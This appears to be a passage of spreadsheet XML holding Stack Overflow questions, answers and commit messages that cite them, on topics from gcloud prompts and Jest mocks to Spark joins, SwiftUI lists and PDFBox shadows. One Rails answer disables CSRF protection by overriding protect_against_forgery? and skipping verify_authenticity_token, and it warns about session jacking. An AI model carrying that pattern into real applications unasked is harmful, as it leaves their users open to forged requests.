    <t xml:space="preserve">I am setting up an n-tier application with MVC, Ninject, and NHibernate (my first using these technologies). For clarity's sake, the tiers are a "Data" tier, a "Services" tier, and a "Web" tier (all are separate projects). 
With MVC, you have your models that are in the "Models" folder. It seems necessary to put my models here to create strongly-typed Views and to generally keep with the philosophy of MVC. 
However, with NHibernate, I also need my models in the "Data" tier so that the mapping can take place and that NHibernate can instantiate actual objects to return to the services layer. 
Duplicating the classes across projects is not very DRY and abstracting them into their own library doesn't seem to play well with MVC (neither in practice nor philosophy).
Any thoughts? How do you structure your O/RM objects vs MVC models? 
</t>
  </si>
  <si>
    <t>C555</t>
  </si>
  <si>
    <t>Disable GCloud component update prompt
- Disabling gcloud components update kubectl
  to automatically accept the prompt.  Note that
  it is also possible to set this via an environment
  variable CLOUDSDK_CORE_DISABLE_PROMPTS=1.
More info:
http://stackoverflow.com/questions/31810593/automate-gcloud-components-update</t>
  </si>
  <si>
    <t>You're looking for the --quiet flag.
From gcloud --help:
 --quiet, -q
    Disable all interactive prompts when running gcloud commands. If input
    is required, defaults will be used, or an error will be raised.
This is generally a flag you'll want for non-interactive contexts.
You may also set the CLOUDSDK_CORE_DISABLE_PROMPTS environment variable to a non-empty value:
export CLOUDSDK_CORE_DISABLE_PROMPTS=1
gcloud components update # This works for all gcloud commands</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In my app, I have many lists where I want the user to be able to reorder the rows via &lt;code&gt;swipeActions&lt;/code&gt;. I also want them to be able to disable &lt;code&gt;editingMode&lt;/code&gt; by tapping anywhere on a row in a &lt;code&gt;List&lt;/code&gt; (it rarely ever makes sense for me to have an &lt;code&gt;EditingButton()&lt;/code&gt; on a &lt;code&gt;Toolbar&lt;/code&gt;).&lt;/p&gt;
&lt;p&gt;I've created a class called &lt;code&gt;TitleList&lt;/code&gt; with the described functionality. It takes in an array of strings, and through a &lt;code&gt;ViewBuilder&lt;/code&gt; closure, I can format the array data however I choose. I've mostly accomplished what I'm trying to in the below code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import SwiftUI
struct HomeView: View
{
    @Environment(\.editMode) private var editMode
    @State private var titles: [String] = [&amp;quot;Title 1&amp;quot;, &amp;quot;Title 2&amp;quot;, &amp;quot;Title 3&amp;quot;]
    var body: some View
    {
        NavigationStack
        {
            VStack
            {
                TitleList(titles: self.$titles)
                {
                    title in
                    NavigationLink(destination: Text(&amp;quot;Test&amp;quot;))
                    {
                        Text(title)
                    }
                    /*title in
                    (Button(action:
                    {
                        print(&amp;quot;Button Pushed&amp;quot;)
                    })
                    {
                        Text(title)
                    }
                    .buttonStyle(PlainButtonStyle())
                    .disabled(self.editMode?.wrappedValue == .active)*/
                }
            }
        }
    }
}
struct TitleList&amp;lt;RowContent: View&amp;gt;: View
{
    @Environment(\.editMode) private var editMode
    @Binding var titles: [String]
    @State private var isReordering: Bool = false
    private let rowContent: (String) -&amp;gt; RowContent
    init(titles: Binding&amp;lt;[String]&amp;gt;, @ViewBuilder rowContent: @escaping (String) -&amp;gt; RowContent = { (_: String) in EmptyView() })
    {
        self._titles = titles
        self.rowContent = rowContent
    }
    var body: some View
    {
        List
        {
            ForEach(self.titles, id: \.self)
            {
                title in
                self.rowContent(title).moveDisabled(!self.isReordering).swipeActions(allowsFullSwipe: false)
                {
                    Button
                    {
                        self.editMode?.wrappedValue = .active
                        self.isReordering = true
                    }
                    label:
                    {
                        Label(&amp;quot;Reorder&amp;quot;, systemImage: &amp;quot;list.bullet&amp;quot;)
                    }
                }
            }
            .onMove
            {
                source, destination in self.titles.move(fromOffsets: source, toOffset: destination)
            }
            .contentShape(Rectangle())
            .allowsHitTesting(self.isReordering)
            .onTapGesture
            {
                if (self.isReordering)
                {
                    withAnimation
                    {
                        self.isReordering = false
                        self.editMode?.wrappedValue = .inactive
                    }
                }
            }
        }
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If I have a row with a &lt;code&gt;NavigationLink&lt;/code&gt; or &lt;code&gt;Text&lt;/code&gt; it works fine. But when I have a row with a Button, .allowsHitTesting(self.isReordering) seems to be blocking the touches to it. If I comment that line out, it works fine, but then lists with &lt;code&gt;NavigationLink&lt;/code&gt; don't work. Easy solution is to send in a &lt;code&gt;Bool&lt;/code&gt; to &lt;code&gt;TitleList&lt;/code&gt; to let it know whether a button will be used or not, but I'm wondering if there is a better way to do this, because there's also a few other side effects of the way I'm doing it:&lt;/p&gt;
&lt;p&gt;-To exit editingMode, the user can only tap the component in the row (i.e. the button or whatever) instead of being able to tap anywhere on the row (unless I wrap &lt;code&gt;rowContent&lt;/code&gt; in an &lt;code&gt;HStack&lt;/code&gt; with a &lt;code&gt;Spacer()&lt;/code&gt;).&lt;/p&gt;
&lt;p&gt;-Even when I have &lt;code&gt;.allowsHitTesting&lt;/code&gt; set to &lt;code&gt;false&lt;/code&gt; for a &lt;code&gt;Button&lt;/code&gt;, I still have to disable it when in &lt;code&gt;editingMode&lt;/code&gt; or else when the user taps the Button, it will do its action instead of shutting off &lt;code&gt;editingMode&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;So was wondering if anyone had a cleaner way to shut off editingMode that accounts for all possible UI components that can be in a row.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C556</t>
  </si>
  <si>
    <t>added a small tweak to enable mailer Notifier#order_shipped action to reuse the same partials as order controller. http://stackoverflow.com/questions/3364523/reusing-form-for-in-view-for-a-mailer-errors-on-forgery</t>
  </si>
  <si>
    <t>Add this to a helper that only your mailer template uses:
def protect_against_forgery?
      false
    end
But make sure that the receiving controller skips the verify_authenticity_token, and that session jacking is ok for whatever that form carries.</t>
  </si>
  <si>
    <t xml:space="preserve">I'm looking to detect local connection loss. Is there a mean to do that, as with the events on the Corelabs components ?
Thanks
EDIT:
Sorry, I'm going to try to be more specific:
I'm currently designing a prototype using datasnap 2009. So I've got a thin client, a stateless server app and a database server.
What I would be able to do is to detect and handle connection loss (internet connectivity) between the client and the server app to handle it appropriately, ie: Display an informative error message to the user or to detect a server shutdown to silently redirect on another app server.
In 2-tier I used to manage that with ODAC components, the TOraSession have some events to handle this issues.
</t>
  </si>
  <si>
    <t>C557</t>
  </si>
  <si>
    <t>Enhance CheckableAvatar component to behave as an actual checkbox (#
1320)
* feat(avatar): add html attributes to avatar props
* perf(avatar): add conditional rendering logic
* fix(alpha-smooth-corners-box): fix initial value of css vars
* docs(alpha-smooth-corners-box): fix default value
* feat(checkable-avatar): reimplement
* test(checkable-avatar): rewrite story
* test(checkable-avatar): add unit test
* chore(checkable-avatar): add comment about using important keyword
* test: update snapshot
* test(checkable-avatar): fix failed test cases
* feat(checkable-avatar): apply touchable hover style
* docs(checkable-avatar): add jsdoc of component
* chore(changeset): add changeset
* docs(avatars): fix type error of stories
* test: fix TypeError: symbol is not a function error
see: https://stackoverflow.com/questions/50726141/symbol-is-not-a-function-react-enzyme-i18n-error</t>
  </si>
  <si>
    <t>I had the same problem, it was due to images imported through webpack. I solved this by creating a fileMock.js with:
module.exports = 'test-file-stub';
Then in jest configuration:
"moduleNameMapper": {
    "\\.(css|scss)$": "identity-obj-proxy",
    "\\.(png|svg|pdf|jpg|jpeg)$": "&lt;rootDir&gt;/__mocks__/fileMock.js"
}
More details here:
https://jestjs.io/docs/en/webpack</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to implement a chat function in my app. I am dealing with the elements being pushed upwards when the keyboard is called. Right now what seems to be working the closest to what I want is setting
&lt;code&gt;android:windowSoftInputMode=&amp;quot;adjustNothing&amp;quot;&lt;/code&gt;, adding &lt;code&gt;imePadding&lt;/code&gt; and &lt;code&gt;windowInsets&lt;/code&gt; since I'm using a &lt;code&gt;Scaffold&lt;/code&gt;.
However, the padding for the chat box lazy columns move but not the contents. I tried using offset y instead but I'm not really sure how to retrieve the height of the keyboard.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Box(
    Modifier
        .padding(top = 10.dp)
        .fillMaxSize()
        .consumeWindowInsets(padding)
        .imePadding()
        .zIndex(0.5f)
) {
    var listState = rememberLazyListState()
    val coroutineScope = rememberCoroutineScope()
    var textBoxList = remember {
        mutableStateListOf(
            TextBoxData(&amp;quot;This is the first message&amp;quot;, &amp;quot;Bot&amp;quot;),
            TextBoxData(&amp;quot;This is the second message&amp;quot;, &amp;quot;User&amp;quot;),
            TextBoxData(&amp;quot;This is the first message&amp;quot;, &amp;quot;Bot&amp;quot;),
            TextBoxData(&amp;quot;This is the second message&amp;quot;, &amp;quot;User&amp;quot;),
            TextBoxData(&amp;quot;This is the last message&amp;quot;, &amp;quot;User&amp;quot;)
        )
    }
    // LazyColumn for chat
    LazyColumn(
        Modifier
            .fillMaxSize()
            .padding(bottom = 50.dp),
        state = listState
    ) {
        //For Each, Map
        items(textBoxList) { item -&amp;gt;
            TextBox(item)
        }
    }
    // Bottom Input Bar
    Box(
        Modifier
            .align(Alignment.BottomCenter)
            .fillMaxWidth()
            .height(50.dp)
            .clip(RoundedCornerShape(20.dp))
            .background(Black)
            .border(2.dp, White, RoundedCornerShape(20.dp))
    ) {
        Row(
            Modifier.fillMaxSize(),
            verticalAlignment = Alignment.CenterVertically
        ) {
            Icon(
                imageVector = FeatherIcons.Mic,
                &amp;quot;Microphone Icon&amp;quot;,
                tint = White,
                modifier = Modifier
                    .fillMaxHeight()
                    .padding(start = 10.dp)
            )
            // Text Field Here
            var inputText by remember { mutableStateOf(&amp;quot;&amp;quot;) }
            var textFieldScrollState = rememberScrollState(10)
            var lineWidth = 255.dp
            var textWidth = measureTextWidth(
                inputText,
                TextStyle(
                    fontSize = 16.sp,
                    fontFamily = RalewayRegular
                )
             )
             // Configure the Alignment and Scroll State
             TextField(
                 value = inputText,
                 onValueChange = {
                     inputText = it
                     val currLine = (textWidth / lineWidth).toInt()
                     coroutineScope.launch {
                         textFieldScrollState.scrollTo(
                             // Dont scroll if on first line (Default is 0)
                             if (currLine == 0) 5 else textFieldScrollState.maxValue - 5)
                             Log.i(&amp;quot;TextSize&amp;quot;, listState.layoutInfo.viewportEndOffset.toString())
                     }
                 },
                 placeholder = {
                     Text(
                         &amp;quot;Type Something...&amp;quot;,
                         color = White.copy(0.7f),
                         fontSize = 16.sp,
                         lineHeight = 16.sp,
                         fontFamily = RalewayRegular
                     )
                 },
                 textStyle = TextStyle(
                     color = White,
                     fontSize = 16.sp,
                     fontFamily = RalewayRegular,
                     textAlign = TextAlign.Start,
                 ),
                 modifier = Modifier
                     .width(290.dp)
                     .fillMaxHeight()
                     .padding(start = 10.dp)
                     .verticalScroll(textFieldScrollState),
                 colors = TextFieldDefaults.colors(
                     focusedTextColor = White,
                     unfocusedTextColor = White,
                     unfocusedContainerColor = Black,
                     focusedContainerColor = Black
                 )
             )
             val regex_space = Regex(&amp;quot;^\\s*\$&amp;quot;) // \\s* means unlimited number of empty (\\s)
             Icon(
                 imageVector = FeatherIcons.Send,
                 contentDescription = &amp;quot;Send button&amp;quot;,
                 tint = White,
                 modifier = Modifier
                     .fillMaxHeight()
                     .padding(start = 10.dp)
                     .clickable {
                         if (!inputText.matches(regex_space)) {
                             textBoxList.add(TextBoxData(inputText, &amp;quot;User&amp;quot;))
                             inputText = &amp;quot;&amp;quot;
                             //Use Coroutine Scope to Scroll
                             //LazyColumn needs items(textBoxList) to scroll to the item index
                             coroutineScope.launch {
                                 listState.scrollToItem(textBoxList.size - 1)
                            }
                        }
                    }
                )
            }
        }
    }
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C558</t>
  </si>
  <si>
    <t>Recommend registering the error handler in prod
This is what currently happens when using Symfony in a standard way, and
people have been wondering online about alarming exceptions from the
Debug component in production.
See https://stackoverflow.com/questions/37431935/is-it-normal-to-have-symfony-component-debug-exception-fatalerrorexception-excep</t>
  </si>
  <si>
    <t>This is probably due to the framework bundle, see https://github.com/symfony/symfony/blob/6eb5f93918d833954ca87c21900c5831e424f9a9/src/Symfony/Bundle/FrameworkBundle/FrameworkBundle.php#L66:
ErrorHandler::register(null, false)-&gt;throwAt($this-&gt;container-&gt;getParameter('debug.error_handler.throw_at'), true);
It is deliberate, here is the discussion about it:
https://github.com/symfony/symfony/issues/11053</t>
  </si>
  <si>
    <t xml:space="preserve">I want to get some ideas on how I might control a video camera through an IP address.  I have an API to control pan and tilt from a local machine.  The code is going to be in C/C++ on Windows.  I am still designing if I want multiple cameras controlled from one application or have a one camera to one application.  Would SOA be a useful architecture to structure my messaging?
</t>
  </si>
  <si>
    <t>C559</t>
  </si>
  <si>
    <t>Fixing rerender bug in CHECK-1302
The number field was losing focus every time the user pressed a key to enter a value. It was actually rerendering with each keystroke because we were rendering the filter component from a function called from within a render cycle itself. By moving the DateRangeSelector components outside of the DateRangeFilter component, passing in the needed values, we avoid the rerender. More here https://stackoverflow.com/a/60510217
Also split `DateRangeSelector` into two functions, `DateRangeSelectorStartEnd` and `DateRangeSelectorRelative`, and moved the conditional to the render of the main component itself.</t>
  </si>
  <si>
    <t>While the answer by Kais will solve the symptoms, it will leave the cause unaddressed.  It will also fail if there are multiple inputs - which one should autofocus itself on rerender then?
The issue happens when you define a component (
FormComponent
) inside the scope of another function which is called each render of your
App
component. This gives you a completely new
FormComponent
each time your
App
component is rerendered and calls
useState
. That new component is then, well, without focus.
Personally I would feel against returning components from a hook. I would instead define a
FormComponent
component, and only return state from useForm state.
But, a working example closest to your original code could be:
// useForm.js
import React, { useState } from "react";
// Define the FormComponent outside of your useForm hook
const FormComponent = ({ setState, state, label }) =&gt; (
  &lt;form&gt;
    &lt;label htmlFor={label}&gt;
      {label}
      &lt;input
        type="text"
        id={label}
        value={state}
        placeholder={label}
        onChange={e =&gt; setState(e.target.value)}
      /&gt;
    &lt;/label&gt;
  &lt;/form&gt;
);
export default function useForm(defaultState, label) {
  const [state, setState] = useState(defaultState);
  return [
    state,
    &lt;FormComponent state={state} setState={setState} label={label} /&gt;,
    setState
  ];
}
// App.js
import useForm from "./useForm";
export default function App() {
  const [formValue, Form] = useForm("San Francisco, CA", "Location");
  return (
    &lt;&gt;
      &lt;h1&gt;{formValue}&lt;/h1&gt;
      {Form}
    &lt;/&gt;
  );
}
Here's a sandbox</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Let's say I have a 2 DataFrames:&lt;/p&gt;
&lt;p&gt;First is &lt;code&gt;tickets&lt;/code&gt; which has 3 columns:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;account_id&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;assignee_id&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;requester_id&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;And I have a second DataFrame &lt;code&gt;users&lt;/code&gt; with 3 columns:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;account_id&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;id&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;name&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I would like as an output a single DataFrame:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;account_id&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;assignee_id&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;assignee_name&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;requester_id&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;requester_name&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Both the assignee and requester of a ticket are instances of an user. So basically my initial code is:&lt;/p&gt;
&lt;pre class="lang-scala prettyprint-override"&gt;&lt;code&gt;tickets
    .as(&amp;quot;ticket&amp;quot;)
    .join(
        users.as(&amp;quot;assignee&amp;quot;),
        $&amp;quot;ticket.account_id&amp;quot; === $&amp;quot;assignee.account_id&amp;quot; &amp;amp;&amp;amp; &amp;quot;ticket.assignee_id&amp;quot; === &amp;quot;assignee.id&amp;quot;,
        &amp;quot;left_outer&amp;quot;
    )
    .join(
        users.as(&amp;quot;requester&amp;quot;),
        $&amp;quot;ticket.account_id&amp;quot; === $&amp;quot;requester.account_id&amp;quot; &amp;amp;&amp;amp; $&amp;quot;ticket.requester_id&amp;quot; === $&amp;quot;requester.id&amp;quot;,
        &amp;quot;left_outer&amp;quot;
    )
    .select(
        $&amp;quot;tickets.*&amp;quot;,
        $&amp;quot;assignee.name&amp;quot;.as(&amp;quot;assignee_name&amp;quot;),
        $&amp;quot;requester.name&amp;quot;.as(&amp;quot;requester_name&amp;quot;)
    )
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This result in a plan where I shuffle &lt;code&gt;tickets&lt;/code&gt; and &lt;code&gt;users&lt;/code&gt; data twice, once for the first join and a second time for the second join (expected).&lt;/p&gt;
&lt;p&gt;Now I'm wondering if there is some kind of smart way to avoid this double shuffle.&lt;/p&gt;
&lt;p&gt;Some abstract idea I had was to somehow have tickets partitioned in some way and achieve to broadcast each individual users such as if user.id is equal to assignee_id or requester_id it is sent to a ticket's partition (a single user might be sent to multiple partitions) and then, locally, in each partition we would perform the two left joins.
This way we would shuffle each DataFrame only once, then we would denormalize the data.&lt;/p&gt;
&lt;p&gt;The more I'm thinking about this problem, the less I'm thinking this is possible without going too deep in Spark custom logic (ideally would be nice to be able to achieve this with Spark DataFrame API).&lt;/p&gt;
&lt;p&gt;I believe the solution must bring-in a custom partitioner because an HashPartitioner can't work here as we won't be able to deduce the partition IDs for a given user if tickets are partitioned using &lt;code&gt;hash(assignee_id, requester_id)&lt;/code&gt; (hash function not being distributive). On the other hand, from what I saw partitioners map 1 row to 1 partition and as said previously, I would like to send a single user to multiple partitions if necessary.&lt;/p&gt;
&lt;p&gt;If you believe this is an impossible problem then tell me, I'm fine with it.
I'll continue searching though, I just found it was an interesting optimization topic.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT&lt;/strong&gt;:&lt;/p&gt;
&lt;p&gt;Here is the idea I have:
Let's call &lt;code&gt;p&lt;/code&gt; the number of partitions I want to repartition my tickets to. I will repartition my tickets using the &lt;code&gt;assignee_id&lt;/code&gt; and &lt;code&gt;requester_id&lt;/code&gt;.
I'm splitting my &lt;code&gt;p&lt;/code&gt; partitions in &lt;code&gt;sqrt(p)&lt;/code&gt; subsections and each subsection therefore contains also &lt;code&gt;sqrt(p)&lt;/code&gt; partitions. I'll use &lt;code&gt;hash(assignee_id) % sqrt(p)&lt;/code&gt; to identify the subsection the ticket belongs to then &lt;code&gt;hash(requester_id) % sqrt(p)&lt;/code&gt; to identify the which partition in the subsection the ticket belongs to.&lt;/p&gt;
&lt;p&gt;E.g. if &lt;code&gt;p = 9&lt;/code&gt;, and &lt;code&gt;hash(x) = x&lt;/code&gt;, tickets where &lt;code&gt;assignee_id % 3 = 1&lt;/code&gt; will be in subsection 1 which contains partitions from 3 to 5. Then if &lt;code&gt;requester_id % 3 = 2&lt;/code&gt; then the ticket go to partition 5.&lt;/p&gt;
&lt;p&gt;(I consider partitions being 0-based indexed)&lt;/p&gt;
&lt;p&gt;&lt;a href="https://i.sstatic.net/65IKk4QB.png" rel="nofollow noreferrer"&gt;Visualization of the partitions when p=9&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;When it comes to users, as I'm going to use a custom partitioner and that a single user needs to go in multiple partitions while a partitioner requires a single target partition per row, I'll need to explode my users so I get multiple rows for a single user to dispatch to multiple partitions.&lt;/p&gt;
&lt;p&gt;How much copies of an user do we need? We need 1 copy per subsection (for the single partition in the subsection where the user matches the condition of the requester) and 1 copy per partition in the subsection where the user matches the condition for the assignee. You can refer to the example I shared, when an user matches a color code it must go in all partitions that match the same color code.&lt;/p&gt;
&lt;p&gt;It gives &lt;code&gt;numberOfCopies = (1 * sqrt(p)) + sqrt(p) - 1 = 2 * sqrt(p) - 1&lt;/code&gt;. The &amp;quot;minus 1&amp;quot; is required because we are accounting twice for the partition where the user matches both the conditions for the assignee and the requester.&lt;/p&gt;
&lt;p&gt;With this repartition, we would have all tickets and users cogrouped in the same partition for operation the 2 left joins without needing to shuffle data.&lt;/p&gt;
&lt;p&gt;Compared to a broadcast where each user with being broadcast to &lt;code&gt;p&lt;/code&gt; partitions, we would be &amp;quot;broadcasting&amp;quot; each user to &lt;code&gt;2.sqrt(p)&lt;/code&gt; partitions (let's consider 1 negligeable).&lt;/p&gt;
&lt;p&gt;The pseudo-code for the partioners would be:&lt;/p&gt;
&lt;pre class="lang-scala prettyprint-override"&gt;&lt;code&gt;def partitionTicket(ticket: Ticket, p: Int): Int = {
    val maxSubP = Math.floor(Math.sqrt(p)).toInt
    val assigneeP = hash(ticket.assignee_id) % maxSubP
    val requesterP = hash(ticket.requester_id) % maxSubP
    assigneeP * maxSubP + requesterP
}
&lt;/code&gt;&lt;/pre&gt;
&lt;pre class="lang-scala prettyprint-override"&gt;&lt;code&gt;// When we explode users, we add a target_p column which is the index of the user copy from 0 to (2.sqrt(p) - 1)
def partitionUser(user: User, p: Int): Int = {
    val maxSubP = Math.floor(Math.sqrt(p)).toInt
    val assigneeSectionIndex = hash(user.id) % maxSubP
    if (user.target_p &amp;gt;= assigneeSectionIndex &amp;amp;&amp;amp; user.target_p &amp;lt; assigneeSectionIndex + maxSubP) {
        return assigneeSectionIndex * maxSubP + user.target_p % maxSubP
    } else {
        val correctedTargetP = if (user.target_p &amp;lt; assigneeSectionIndex) {
            user.target_p
        } else {
            user.target_p - maxSubP + 1
        }
        return correctedTargetP * maxSubP + assigneeSectionIndex
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Hopefully I didn't make any mistake in my calculus.
Next step is to try making the associated Spark code.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C56</t>
  </si>
  <si>
    <t>Added login/logout and user registration in db
Interaction with user via fb api is done with
Python SDK.
The best approach
    Do the Facebook auth on your frontend.
    You can easily retrive user data and then
    with $http.post you can submit this data
    to your backend app!
    Then if you need to talk with backend
    with Facebook you can use the authResponse returned
    from library in frontend authentication.
    In this way in your app domains you specify
    only the frontend url.
    And your user doesn't see the backend app.
    http://stackoverflow.com/questions/26054940/facebook-authentication-on-angularjs-app-with-php-backend</t>
  </si>
  <si>
    <t>I advice you to use this library http://jberta93.github.io/ng-facebook-api/ and do the Facebook auth on your frontend. You can easily retrive user data and then with $http.post you can submit this data to your backend app! Then if you need to talk with backend with Facebook you can use the authResponse  returned from library in frontend authentication! In this way in your app domains you specify only the frontend url. And your user doesn't see the backend app!
A little example:
$scope.logAndRetriveFacebookUser = function(){
    facebook.getUser().then(function(r){
        var user = r.user; //User data returned;
        var authResponse = r.authResponse; //Token auth, id etc..
        $http.post('/backend-login-url', {user:user,authResponse:authResponse});
    }, function(err){
        console.log("Ops, something went wrong...");
    });
}</t>
  </si>
  <si>
    <t xml:space="preserve">Background:
I have a VB6 application I've "inherited" that generates a PDF for the user to review using unsupported Acrobat Reader OCX integration.  The program generates an FDF file with the data, then renders the merged result when the FDF is merged with a PDF.  It only works correctly with Acrobat Reader 4 :-(.  Installing a newer version of Acrobat Reader breaks this application, making the users very unhappy.
I want to re-architect this app so that it will send the data to be merged to a PDF output generation server.  This server will merge the data passed to it onto the form, generate a PDF image of this, and store it, so that any user wishing to view the final result can then simply get the PDF (it is generated just once).  If the underlying data is changed, the PDF will be deleted and regenerated next time it is requested.  The client program can then have any version of Acrobat Reader they wish, as it will be used exclusively for displaying PDF files (as it was intended).  The server will most likely be written in .NET (C#) with Visual Studio 2005, probably as a Web Service... 
Question:
How would others recommend I go about this?  Should I use Adobe's Acrobat 9 at the server to do this, puting the data into FDF or Adobe's XML format, and letting Acrobat do the merge?  Are there great competitors in the "merge data onto form and output a PDF" space?  How do others do this?  It has to be API based, no GUI at the server, of course...
While some output is generated via FDF/PDF, another part of the application actually sends lines, graphics, and text to the printer (or a form for preview purposes) one page at a time, giving the proper x/y coordinates, font, size, etc. for each, knowing when it is at the end of a page, etc.  This code is currently in the program that displays this for the user to review, and it is also in the program that prints the final form to the printer.  For consistency between reviewer and printer, I'd like to move this output generation logic to a server as well, either using a good PDF generation API tool or use the code as is and generate a PDF with a PDF printer... and saving this PDF for display by the clients.
Googling "Form software" or "fill form software" or similar searches returns sooooooooo much unrelated material, mostly related to UI for users to fill in forms, I just don't know how to properly narrow down my search.  This site seems the perfect place to ask such a question, as other programmers must also need to generate similar outputs, and have tried out some great tools.
EDIT: 
I've added PDF tag as well as PDF-generation. 
Also, my current customer insists on PDF output, but I appreciate the alternative suggestions.
</t>
  </si>
  <si>
    <t>C560</t>
  </si>
  <si>
    <t>Added guard in simulator to prevent javascript callbacks from running
 before the browser component has finished loading its callback plumbing. This fixes an issue with the browser component showing a 404 error on the codenameone site. E.g. https://stackoverflow.com/questions/45664270/strange-behavior-of-code-name-one-browser-component-in-the-simulator</t>
  </si>
  <si>
    <t>You are calling the callback before the page is finished loading so the "bridge" hasn't been completely set up yet.  The safest thing to do is place all of your JS bridge stuff inside the onLoad web event to guarantee that setup has been completed.
BrowserComponent bc = new BrowserComponent();
bc.addWebEventListener("onLoad", e-&gt;{
    JavascriptContext ctx = new JavascriptContext(bc);
    ... etc....
});
That said, I have made a small fix that should guard against this problem
here
It will be available in the next library update (Friday I believe)</t>
  </si>
  <si>
    <t xml:space="preserve">I hope this is not to off-topic for this site.
Recently I have had the opportunity to review banking systems for a client. Given how much time I have had to ponder over architecture in my own projects and for a overall system architecture, it is remarkable how difficult I find this task.
I started off writing a list of features but found that too limiting since it would only be a matter of the vendor giving me the "yeah we do web services" answer. Would it be a nice extensible solution or a thin wrapper to their proprietary API?
I have since then decided to approach the task by using a few subjects and in a conversational manner let the vendor give me the gist (nuts and bolts) of the system.
What topics would you suggest for a system review?
The one topic I find most important is extensibility and the way the system supports changes while still allowing for upgrades. Also discover ability of programming interfaces is an important one.
</t>
  </si>
  <si>
    <t>C561</t>
  </si>
  <si>
    <t>New AddDropShadow test focusing on the stack overflow question 68020506
Need help on applying drop shadow effects to a pdf box components in java
https://stackoverflow.com/questions/68020506/need-help-on-applying-drop-shadow-effects-to-a-pdf-box-components-in-java
testRectangleWithDropShadow - This test shows how to apply a simply drop shadow to a rectangle. It may look fancier if one applied a bit of blur to the shadow.</t>
  </si>
  <si>
    <t>You can add a drop shadow by first drawing a dark rectangle with transparency at a slight offset right before drawing your content. In your case e.g. like this:
float imageWidth = imageOriginalWidth*scaleX;
float imageHeight = imageOriginalHeight*scaleY;
float imageY = page.getMediaBox().getHeight() - (top + imageHeight-58); 
float imageX = -104; 
// vvv--- code added for shadow
PDExtendedGraphicsState extGS = new PDExtendedGraphicsState();
extGS.setNonStrokingAlphaConstant(.2f);
contentStream.saveGraphicsState();
contentStream.setGraphicsStateParameters(extGS);
contentStream.setNonStrokingColor(Color.BLACK);
contentStream.addRect(left + 5, page.getMediaBox().getHeight() - top - height - 5, width, height);
contentStream.fill();
contentStream.restoreGraphicsState();
// ^^^--- code added for shadow
contentStream.addRect(left, page.getMediaBox().getHeight() - top - height, width, height);
contentStream.clip();
contentStream.drawImage(pdImage, imageX, imageY, imageWidth, imageHeight);
contentStream.close();
...
(
AddDropShadow
test
testRectangleWithDropShadow
)
You might want to play around with different values for the alpha value (.2f), the color (BLACK), and the offsets (5 each) I used. Also I took the clip path as area to apply a shadow to. If your image does not fully fill that area, you might want to play around with the coordinates here.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm been reading the examples from the boost.asio docs to have a understanding of how to use it to be able to do more complex networking stuff in c++, but when I try to run this udp client daytime example giving a hostname to run the service &amp;quot;daytime&amp;quot; to receive a response it freezes when receives the data from the socket, stores the data and the length, and the result expected should be that it respond with the current daytime without get freeze doing the constant request of the service for daytime in the hostname passed, and I don't actually know which servers give that service supporting udp request for that service.&lt;/p&gt;
&lt;p&gt;So I would like the reason why that happen and get feedback to know more about networking and understand more deeply how to use asio from boost&lt;/p&gt;
&lt;p&gt;Edit: sorry if I was not clear, but I tried to set the host name for example: time.google.com to do the request, and I asked to copilot if it could help me and gave a solution, but It changed some things of the code, and worked as expected, but I want to know why exactly this example does not work as expected as the tcp client example with the hostname time.nist.gov, I don't know why so many people get upset so easy, I guess I have no idea about anything I don't know yet, and should not ask about guidance .&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#include &amp;lt;array&amp;gt;
#include &amp;lt;iostream&amp;gt;
#include &amp;lt;boost/asio.hpp&amp;gt;
using boost::asio::ip::udp;
int main(int argc, char* argv[])
{
  try
  {
    if (argc != 2)
    {
      std::cerr &amp;lt;&amp;lt; &amp;quot;Usage: client &amp;lt;host&amp;gt;&amp;quot; &amp;lt;&amp;lt; std::endl;
      return 1;
    }
    boost::asio::io_context io_context;
    udp::resolver resolver(io_context);
    udp::endpoint receiver_endpoint =
      *resolver.resolve(udp::v4(), argv[1], &amp;quot;daytime&amp;quot;).begin();
    udp::socket socket(io_context);
    socket.open(udp::v4());
    std::array&amp;lt;char, 1&amp;gt; send_buf  = {{ 0 }};
    socket.send_to(boost::asio::buffer(send_buf), receiver_endpoint);
    std::array&amp;lt;char, 128&amp;gt; recv_buf;
    udp::endpoint sender_endpoint;
    # Where it freezes
    size_t len = socket.receive_from(
        boost::asio::buffer(recv_buf), sender_endpoint);
    std::cout.write(recv_buf.data(), len);
  }
  catch (std::exception&amp;amp; e)
  {
    std::cerr &amp;lt;&amp;lt; e.what() &amp;lt;&amp;lt; std::endl;
  }
  return 0;
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C562</t>
  </si>
